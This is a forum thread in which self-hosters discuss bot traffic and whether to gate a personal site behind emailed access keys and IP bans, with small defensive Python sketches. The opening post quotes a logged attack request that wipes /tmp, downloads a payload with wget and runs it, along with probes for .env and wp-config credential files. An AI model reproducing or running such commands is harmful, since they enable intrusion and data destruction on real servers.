
how do you feel about website access?


j:
daily, i get requests to my site like this:


--- Quote ---"GET / HTTP/1.1" 200 726 "-" "A company searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: email"

--- End quote ---

... and this:


--- Quote ---"GET /shell?cd+/tmp;rm+-rf+*;wget+IP/jaws;sh+/tmp/jaws HTTP/1.1"

--- End quote ---

sometimes i get blocks of requests from the same agent:


--- Quote ---"GET /.env HTTP/1.1"
"GET /wp-config.php.bak HTTP/1.1"
"GET /wp-config.php~ HTTP/1.1"
"GET /phpinfo.php HTTP/1.1"
"GET /info.php HTTP/1.1"
"GET /.vscode/sftp.json HTTP/1.1"
"GET /sftp-config.json HTTP/1.1"

--- End quote ---

... sent minutes apart, regardless of whether they get a 200.


the above doesn't particularly affect security now that internet software behemoths like apache, nginx and lighttpd exist. yet these redundant requests can still hinder the servers my friends run - where connections as slow as dial-up still exist (or where folks use nearlyfreespeech.net!) and the number of requests you receive matters as much as the amount of data being transferred. the web is still extraordinarily heavy compared to protocols like spartan, nex and justtext, and every self-hoster i've asked has reported receiving the same requests as the above.

my answer to the above is to add walls to my site:

- visitors email me asking for access to the site and telling me a little about why they're interested in reading - a bit of human connection!
- i respond with a key they can append to the URL, which lets them see content (e.g. http://website.com?key=letmein)
- agents trying to access my domain have three lifetime do-overs - where they can make a bad request - before their IP is permanently blacklisted

this has worked pretty well with my own code (which folks can email me for), at least - a rough sketch of the idea follows.
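to give a rough idea of the shape of it - this isn't the code i actually run, and the key set, strike limit and in-memory tracking below are just placeholders for illustration - a key-check-plus-three-strikes server in python might look something like:


--- Code ---
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

ALLOWED_KEYS = {"letmein"}        # keys handed out by email
STRIKE_LIMIT = 3                  # lifetime do-overs per address
strikes: dict[str, int] = {}      # ip -> bad-request count (in memory only here)
banned: set[str] = set()

class KeyedHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        ip = self.client_address[0]
        if ip in banned:
            self.close_connection = True   # drop without serving anything
            return
        key = parse_qs(urlparse(self.path).query).get("key", [""])[0]
        if key in ALLOWED_KEYS:
            body = b"<p>hello, invited reader!</p>"
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        # anything else counts as one of the three lifetime do-overs
        strikes[ip] = strikes.get(ip, 0) + 1
        if strikes[ip] >= STRIKE_LIMIT:
            banned.add(ip)
        self.send_response(403)
        self.end_headers()

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8080), KeyedHandler).serve_forever()

--- End code ---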

how do other folks feel about this? do you think defending your website aligns with what the web is now? if so, how would you approach mitigating the sheer amount of bloat and the bots that scrape sites? would my approach deter you from visiting my site if it were implemented?

Melooon:
That's a fun solution, and it definitely opens the door for you to play with the idea a bit and make your site more unique! I assume if you're giving everyone personal access keys then you can also code the site to personalise itself to each key? Maybe make their name appear or allow them to have a favourite colour that changes the design  :grin: You could even make a personalised newsletter that emails them only things they haven't read.
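Just to sketch what I mean (the keys, names and colours below are completely made up, not anything j actually runs), per-key personalisation could be as simple as:


--- Code ---
# toy per-key personalisation: map each handed-out key to some preferences
KEY_PREFS = {
    "letmein":   {"name": "friend", "colour": "#335577"},
    "secretkey": {"name": "sam",    "colour": "#aa3366"},
}

def personalised_page(key: str) -> str:
    # fall back to a neutral look for unknown keys
    prefs = KEY_PREFS.get(key, {"name": "visitor", "colour": "#f4f4f4"})
    return (
        f"<body style='background:{prefs['colour']}'>"
        f"<h1>welcome back, {prefs['name']}!</h1>"
        "</body>"
    )

if __name__ == "__main__":
    print(personalised_page("letmein"))

--- End code ---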

Although... I suppose on the flip side to that, you'd also have to track each personal access key to log what individuals are reading on your site  :tongue: (I'm not denouncing this - used altruistically this is great info for any writer/blogger, but it does run the risk of spoiling the writer's direction of interest! It may also deter some people from visiting.)

As far as I know the Neocities approach is to simply overwhelm bots with resources - e.g. if you have 500 visitors and 5000 bots, then you make your server able to handle 20,000 visitors/bots.

That's an approach I tend to try and replicate; I always make sure that there are at least 3x more resources than necessary, since the pain of things going offline at a bad moment is greater than the cost of providing the resources.

That's definitely not a good approach for anyone self-hosting on dial-up or using a very low-power server; but for anyone using VPS hosting it's a viable system. There is always a limit to the number of bots that can exist, since they suffer exactly the same bandwidth limits web hosts do, so I suppose they will always balance each other out  :eyes:

brisray:
Just my tuppence worth: I find any sort of restriction on me viewing a website puts me off it for a long time. I do sign up for sites, but only if they have enough viewable content to make me interested in what else they have.

Just some thoughts on traffic and bots in general...

The second you open a computer up on the web, the bots will find it. I found that out over 20 years ago. They don't just crawl the sites; I've had automated attacks against both the web and FTP servers I run. Although I've hardened the servers as much as I can, I am certain I couldn't stop a determined attack against them.

I've been playing around with my old web logs. Even in 2011, the oldest I've still got, bots were responsible for twice the number of visits as humans - well, almost all humans; it's hard to tell if I missed some. June 2011: 8,449 pages (human) vs 17,476 (bots). It's only gotten worse - October 2023: 34,100 (human) vs 918,543 (bots).
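For anyone who wants to do a similar tally, a rough sketch against an Apache combined-format log could look like this - the bot keywords and log file name are just assumptions for the example, not exactly how I count mine:


--- Code ---
# count human vs bot requests in an apache combined-format access log
import re

BOT_HINTS = ("bot", "crawler", "spider", "expanse")
# matches: "GET / HTTP/1.1" 200 726 "-" "User-Agent string"
LOG_LINE = re.compile(r'"[^"]*" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"')

def tally(path: str) -> tuple[int, int]:
    humans = bots = 0
    with open(path, encoding="utf-8", errors="replace") as log:
        for line in log:
            match = LOG_LINE.search(line)
            ua = match.group("ua").lower() if match else ""
            if any(hint in ua for hint in BOT_HINTS):
                bots += 1
            else:
                humans += 1
    return humans, bots

if __name__ == "__main__":
    humans, bots = tally("access.log")
    print(f"{humans} human requests vs {bots} bot requests")

--- End code ---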

The server (Apache) can easily cope with the traffic - I keep track of that as well, and my ISP hasn't complained about the bandwidth usage. If you're using dial-up then it might be a problem.

If the bots get too much, I'll send them off somewhere - maybe the black hole of 0.0.0.0 or a Japanese porn site or something.

The largest source of bot visits I get is my own fault. A startup penetration-testing company made me an offer I couldn't refuse - free scans for life! Once a month they crawl every file on my largest site, as well as poke around to see if they can get out of the server. Guess what my biggest security risk is? Making the logs and server status page public - too much information about what's going on behind the public face of the sites.

j:
i appreciate the ideas!


--- Quote from: Melooon ---... you can also code the site to personalise itself to each key?

--- End quote ---

that's a really good idea that i hadn't thought of - though i'll leave that up to somebody with a more creative site than mine. i'm going to work on a minimalist webserver soon that incorporates the original idea, so my code will be reachable somewhere eventually!

the approach i'm planning on taking is very bland and uncreative, but it could be modified: i just plan on disconnecting the user without serving any data, given that i'm working with plain old TCP/IP. there'll be a tmpfile() somewhere that keeps track of 404s requested per device; when too many pile up, that device's connections will just be dropped, which saves a ton of resources!
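very roughly - and with the port, threshold and file layout below being placeholders rather than the real thing - the idea looks something like:


--- Code ---
# count 404s per address in a temp file, then drop repeat offenders outright
import socket
import tempfile

MAX_404S = 3
# stand-in for the tmpfile(): one "ip count" line per offending address
strike_file = tempfile.NamedTemporaryFile(mode="w+", delete=False)

def strikes_for(ip: str) -> int:
    strike_file.seek(0)
    for line in strike_file:
        addr, count = line.split()
        if addr == ip:
            return int(count)
    return 0

def record_strike(ip: str) -> None:
    counts = {}
    strike_file.seek(0)
    for line in strike_file:
        addr, count = line.split()
        counts[addr] = int(count)
    counts[ip] = counts.get(ip, 0) + 1
    strike_file.seek(0)
    strike_file.truncate()
    for addr, count in counts.items():
        strike_file.write(f"{addr} {count}\n")
    strike_file.flush()

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("0.0.0.0", 8080))
server.listen()

while True:
    conn, (ip, _port) = server.accept()
    if strikes_for(ip) >= MAX_404S:
        conn.close()                 # drop immediately, serve nothing
        continue
    request = conn.recv(4096).decode(errors="replace")
    parts = request.split(" ")
    path = parts[1] if len(parts) > 1 else "/"
    if path == "/":                  # the only page this toy server knows
        conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 5\r\n\r\nhello")
    else:
        record_strike(ip)            # a 404 counts against the requester
        conn.sendall(b"HTTP/1.1 404 Not Found\r\nContent-Length: 0\r\n\r\n")
    conn.close()

--- End code ---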

i like the ideas and considerations, though :P

dirtnap:
on the actual problem: this isn't about palo alto's detested crawler, is it? the one that flagrantly ignores robots.txt?

are you not able to block access to your server according to user-agent? because frankly, if not, i'd say that's the bigger issue here. since this crawler's ua is comically recognisable, it should be possible to block any request containing the phrase "expanse, a palo alto", or for that matter probably just "palo alto".
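in a hand-rolled server like the one you mention, a check like that could be as small as this - a sketch, with the header-parsing helper and the exact substrings made up for the example:


--- Code ---
BLOCKED_UA_SUBSTRINGS = ("expanse, a palo alto", "palo alto")

def parse_headers(raw_request: str) -> dict[str, str]:
    """Pull 'Name: value' header lines out of a raw HTTP request string."""
    headers = {}
    for line in raw_request.split("\r\n")[1:]:
        if not line:
            break                      # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers

def is_blocked(raw_request: str) -> bool:
    ua = parse_headers(raw_request).get("user-agent", "").lower()
    return any(s in ua for s in BLOCKED_UA_SUBSTRINGS)

--- End code ---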

i think blocking the offending crawler (which, again, should be simple to do via the recognisable ua) is a much more reasonable response to the problem of one crawler requesting too much traffic than... denying everyone access to your site.

because in response to your final question:


--- Quote ---would my approach deter you from visiting my site if it were implemented?
--- End quote ---

i would think "well that's a novel way to harvest emails", close the tab, and forget about your site.

any site that requires me to do anything to view it beyond selecting a language loses my interest immediately. i'm certainly not handing over my email just to fucking read. i'm extremely tired of forums that require an account to view, and i'm certainly not making an account to view whatever your site is - and yes, requiring someone to send an email and get a unique key is, in any functional sense, making an account.
